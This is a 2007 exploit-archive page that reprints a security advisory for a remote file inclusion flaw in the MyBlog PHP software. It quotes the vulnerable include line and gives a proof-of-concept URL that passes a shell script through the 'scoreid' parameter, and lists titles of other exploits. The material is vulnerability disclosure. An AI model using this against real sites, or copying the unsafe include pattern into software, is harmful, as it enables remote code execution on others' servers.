exploits , vulnerabilities , articles , MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability

2007-04-14 QDBlog 0.4 (SQL Injection/LFI) Multiple Remote Vulnerabilities
2007-04-03 Xoops Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
2007-03-30 sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
2007-03-20 GeBlog 0.1 GLOBALS[tplname] Local File Inclusion Exploit (win)
2007-03-16 Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit

2007-04-09

MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability

Rated as : High Risk

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   :::: 
"""
"""   ::   ::                 ::  :   ::   
"""
"""     ::::    ::   :: ::::: :::::   :::: 
"""
"""    ::  ::   ::: ::: :: :: ::  ::    :: 
"""
"""  ::      :: :: :  : ::::: ::   :: :::: 
"""
"""                                        
"""
"""""""""""""""""""""""""""""""""""""""""""""""
  Xmor$ Security Vulnerability Research TM


# Tilte: MyBlog: PHP and MySQL Blog/CMS software Remote File Include
Vulnerabilitiy


# Author..................: [the_Edit0r]
# Homepage ...............: [Www.XmorS-sEurity.coM]
# Location ...............: [Iran]
# Software ...............: [MyBlog: PHP and MySQL Blog/CMS software]
# Impact..................: [ Remote ]
# Site Script ............: [http://sourceforge.net/projects/myblog/]
# We ArE .................: [
Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]




------------------------------------- Codes
--------------------------------


include($_GET['scoreid'] . "_setby.txt");


------------------------------- proof Of Concept
---------------------------



 www.example.com/[path]/games.php?scoreid=[Sh3ll-Script]



----------------------------------------------------------------------------





# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]

securitydot.net - 2007-04-09

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit